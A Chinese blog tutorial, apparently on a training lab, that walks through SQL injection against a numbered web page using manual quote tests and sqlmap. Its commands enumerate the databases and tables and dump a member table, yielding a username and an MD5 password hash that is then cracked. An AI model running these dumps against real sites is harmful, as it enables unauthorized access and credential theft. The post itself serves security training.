专栏首页Web安全技术SQL注入-报错盲注
原创

SQL注入-报错盲注

我们这期的主题报错盲注,我们就得用SQLMAP进行报错盲注的漏洞利用

原文是带图的,要看有图的划到最下方有我博客链接

对站点http://219.153.49.228:41592/new_list.php?id=1进行测试

先手工判断一下这个是不是注入点

在id=1后面加‘后报错

添加and 1=1正常

添加and1=2正常

添加id=-1异常

使用SQLMAP扫描是否存在注入点

sqlmap.py -u "http://219.153.49.228:41592/new_list.php?id=1"

输入y回车

前面的sqlmap.py是文件路径,如果你的sqlmap文件名不叫sqlmap.py叫mysqlmap.py那就改成mysqlmap.py,如果你使用的是kali里面的sqlmap那就把后缀.py去掉

sqlmap.py -u "http://219.153.49.228:41592/new_list.php?id=1" --dbs 查找数据库

选择stormgroup,因为其他表都是MySQL自带的

sqlmap.py -u http://219.153.49.228:41592/new_list.php?id=1 -D stormgroup --tables扫描出表为member

sqlmap.py -u http://219.153.49.228:41592/new_list.php?id=1 -D stormgroup -T member --columns 查找出name 和password

sqlmap.py -u http://219.153.49.228:41592/new_list.php?id=1 -D stormgroup -T member -C "name,password,status" --dump 查出用户名为mozhe ,password为3c48eb99af674cdec2686f9c264211a3

md5解密,即成功的完成了一次报错盲注

转载请注明原站文章链接和作者

渗透千万条,授权第一条,谨记

原文博客链接:https://www.sakuar.cn/report-errors/

本文原创,这个博客站是我的,现在发的是跟我博客的一样

原创声明,本文系作者授权云+社区发表,未经许可,不得转载。

如有侵权,请联系 yunjia_community@tencent.com 删除。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 信息搜集-Github文件泄露搜索语法

    site:Github.com smtp admin@%.com  (webmaster、root、help、service,And so on..)

    酷酷的繁星
  • AJE-Windows渗透环境

    今天给大家分享由AJE团队搭建好的渗透环境,AJE Windows,这款渗透环境是Windows的发行版,集成了各种重量级安全工具和常用的安全工具,以及搭建者收...

    酷酷的繁星
  • kali更新源

    1.打开命令行输入ping www.baidu.com,停止方法请按CTRL+C 键停止监测,如果虚拟机给出了这个网站的延迟信息和IP就代表网络是正常的,如果没...

    酷酷的繁星
  • Django学习(第一天:环境的搭建)python2.7django安装第一个django项目

    罗罗攀
  • Python自动重新加载模块详解(autoreload module)

    使用python开发后台服务程序的时候,每次修改代码之后都需要重启服务才能生效比较麻烦。

    砸漏
  • 数据结构(四):栈

    栈是只能在一端进行插入和删除操作的线性表。表中允许进行插入、删除操作的一端称为栈顶。栈顶的位置是动态的,由一个称为栈顶指针的位置指示器指示。表的另一端称为栈底。

    渔父歌
  • 基于Python的反连Shell和后渗透工具

    声明:该软件供学习研究使用或作为一个POC。开发者不赞同和鼓励或以其它方式支持非授权的电脑入侵和网络破坏。 RSPET (Reverse Shell and ...

    FB客服
  • Web前端学习 第3章 JavaScript基础教程9 内置对象

    javascript为我们提供了很多内置对象,这些内置对象为我们提供了很多语言的基本功能。我们之前学过的数组就是JavaScript的内置对象,除了数组我们还应...

    学习猿地
  • appium+python自动化53-adb logcat查看日志

    做app测试,遇到异常情况,查看日志是必不可少的,日志如何输出到手机sdcard和电脑的目录呢?这就需要用logcat输出日志了 以下操作是基于windows平...

    上海-悠悠
  • 学会这15点,让你分分钟拿下Redis数据库

    REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Red...

    民工哥

扫码关注云+社区

领取腾讯云代金券